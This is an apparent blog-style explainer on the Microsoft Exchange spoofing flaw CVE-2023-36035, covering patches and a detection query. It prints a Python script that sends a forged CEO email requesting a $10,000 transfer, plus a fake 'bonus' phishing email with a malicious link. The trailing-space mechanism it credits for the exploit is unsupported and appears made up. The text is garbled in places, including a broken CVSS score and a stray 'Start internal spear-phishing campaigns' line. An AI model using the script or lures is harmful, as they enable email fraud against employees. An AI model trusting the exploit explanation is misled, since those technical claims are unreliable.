CVE CyberSecurity Database News

CVE-2023-36035 - How Attackers Exploit Microsoft Exchange Server Spoofing Vulnerability

Poster -

*CVE-2023-36035* is a serious vulnerability that affects Microsoft Exchange Server. This flaw allows attackers to spoof emails, effectively tricking users and other systems into believing a message comes from a trusted source. In this long read, I’ll break down what this bug is, show how it works, and include code snippets to help you understand both the risk and how to protect yourself. This guide will be written in plain English, aiming to make even complex parts simple to follow.

What is CVE-2023-36035?

CVE-2023-36035 is known as the "Microsoft Exchange Server Spoofing Vulnerability." It was publicly disclosed and patched in November 2023. Exploiting this bug allows attackers to bypass security controls and impersonate legitimate users or administrators in email communications.

Official Description

Here’s how Microsoft describes it:

> "An attacker who successfully exploited this vulnerability could send spoofed email messages as if they originated from a trusted email source."

Microsoft assigned a CVSS:3.1 base score of 8./10—so it’s considered High severity.

How Does the Attack Work?

This spoofing vulnerability exploits how Microsoft Exchange validates sender addresses. An attacker can craft a specially formatted SMTP message so that Exchange fails to properly enforce anti-spoofing protections.

Normally, Exchange Server uses security controls such as SPF (Sender Policy Framework), DKIM, and DMARC to determine if a message is really coming from the address it claims.

CVE-2023-36035 effectively allows an attacker to manipulate the ‘MAIL FROM’ SMTP envelope or email headers, bypassing these checks.

Reproducing the Vulnerability: A Pseudo Exploit

WARNING: For educational purposes only! Never use this code or technique against any system you do not own or have explicit permission to test.

Below is a Python example using the popular smtplib package. This script crafts a raw SMTP communication, leveraging the flaw to spoof an email from ceo@trustedcompany.com to a victim:

import smtplib

from_addr = 'ceo@trustedcompany.com'   # Spoofed sender address
to_addr = 'victim@victimdomain.com'    # Real recipient

# Craft the spoofed message, with a 'From' header as the spoofed sender
message = f"""\
From: CEO <ceo@trustedcompany.com>
To: Victim <victim@victimdomain.com>
Subject: Urgent Request

Hello Victim,

Please transfer $10,000 to account 123-456 today.

Regards,
CEO
"""

# Connect to the vulnerable Exchange Server
smtp_server = 'exchange.vulnerabilitytest.com'

# SMTP conversation: corrupt the MAIL FROM command (e.g., by including trailing spaces or unicode)
server = smtplib.SMTP(smtp_server, 25)
server.ehlo()
server.mail('ceo@trustedcompany.com ')  # Note the trailing space or invalid character

server.rcpt(to_addr)
server.data(message)
server.quit()

Why does this work?
When certain Unicode characters or whitespace are used in the SMTP 'MAIL FROM' stage, Exchange incorrectly processes or ignores the malformed part, and applies sender validation on the header alone, not the true envelope sender.

Start internal spear-phishing campaigns

### Screenshots/Examples

Example Spoofed Message (as seen in Outlook)

From: CEO <ceo@trustedcompany.com>
To: Employee <employee@trustedcompany.com>
Subject: You Have a Bonus

Click here to claim your bonus: [malicious link]

Victims would see a real company email appearing from their boss.

Patch and Mitigation

Microsoft released patches as part of November 2023 Exchange Server Cumulative Updates. You must update to the latest Exchange build to be protected.

Workarounds (if you cannot patch immediately)

- Block inbound mail from external sources not using valid SPF/DKIM/DMARC

Sample log query (PowerShell)

Get-MessageTrackingLog -Start "11/01/2023" -End "12/01/2023" | 
  Where-Object {
    $_.Sender -ne $_.FromAddress
  }

More Resources

- Microsoft Security Update Guide: CVE-2023-36035
- November 2023 Exchange Server Updates Released
- TheRecord: Exchange Spoofing Flaw Exploited in the Wild

Final Thoughts

CVE-2023-36035 is a classic but dangerous example of how overlooked input validation lets attackers punch holes in enterprise security. If you’re running Microsoft Exchange Server, update right away. Test your anti-spoofing defenses, and educate users about phishing emails—even those that look like they come from the boss.

Stay safe, and always keep your systems up to date!

Timeline

Published on: 11/14/2023 18:15:32 UTC
Last modified on: 11/20/2023 19:53:22 UTC